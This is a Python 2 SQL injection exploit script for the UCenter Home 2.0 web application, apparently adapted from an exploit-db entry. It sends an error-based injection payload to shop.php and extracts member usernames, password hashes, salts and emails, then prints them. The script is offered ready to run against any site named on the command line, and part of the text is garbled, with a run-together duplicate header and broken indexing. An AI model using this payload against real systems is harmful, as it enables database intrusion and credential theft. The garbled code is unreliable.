UCenter Home 2.0 EXP
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl#!/usr/bin/env python
import sys
import urllib2
import re
def info():
print 'From:http://www.exploit-db.com/exploits/14997/'
print 'http://www.hake.cc/Web_loudong/'
print 'changed:qiaoy'
print 'exp:'
print ' ./UCenter_Home_2.0.py site'
def main():
if len(sys.argv) != 2:
info()
else:
site = sys.argv
if site == 'http://':
sitesite =site
elif site == 'https://':
sitesite = site
else:
site = 'http://'+site
try:
url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'
Value = urllib2.urlopen(url).read()
Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)
hacked = Msg.split(':')
print 'Name: '+hacked
print 'Passwd:'+hacked
print 'salt: '+hacked
print 'email: '+hacked
except:
print 'Sorry,I can\'t work............'
if __name__ == '__main__':
main()
Ò³:
[1]